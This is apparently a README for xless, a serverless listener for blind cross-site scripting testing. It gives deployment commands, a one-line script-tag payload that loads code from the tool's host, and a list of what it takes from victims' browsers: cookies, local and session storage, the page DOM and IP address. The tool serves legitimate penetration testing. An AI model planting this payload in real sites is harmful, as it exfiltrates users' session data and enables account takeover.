xless: The Serverless Blind XSS App

Serverless Blind XSS

XLESS – The Serverless Blind XSS App

xless is a serverless blind XSS app that can be used to identify blind XSS vulnerabilities using your own deployed version of the app. There is no need to run a full deployment process; just set up a zeit.co account and run bash deploy.sh. That’s it. You have a fully-running Blind XSS listener that uses Slack to notify you for blind XSS callbacks.

Requirements

  • zeit.co account: Zeit provides a free plan for serverless. If you use another provider for serverless, code changes should be minimal.
  • Slack Incoming Webhook URL.

Deployment

  1. Run:
$ git clone https://github.com/mazen160/xless.git
$ bash deploy.sh

> Deploying ~/xless under X
> https://xless.now.sh [v2] [in clipboard] [4s]
> Success! Deployment ready [4s]
  1. Use the URL for blind XSS testing 🔥

Xless will automatically serve the XSS payload, collect information, and exfiltrate it into your serverless app, which is then sent right to you in Slack.

Example Payload

<script src="https://xless.now.sh"></script>

Demo

 

Collected Data

  • Cookies
  • User-Agent
  • HTTP Referrer
  • Browser DOM
  • Browser Time
  • Document Location
  • Origin
  • LocalStorage
  • SessionStorage
  • IP Address

Copyright (C) 2019 Mazin Ahmed

Source: https://github.com/mazen160/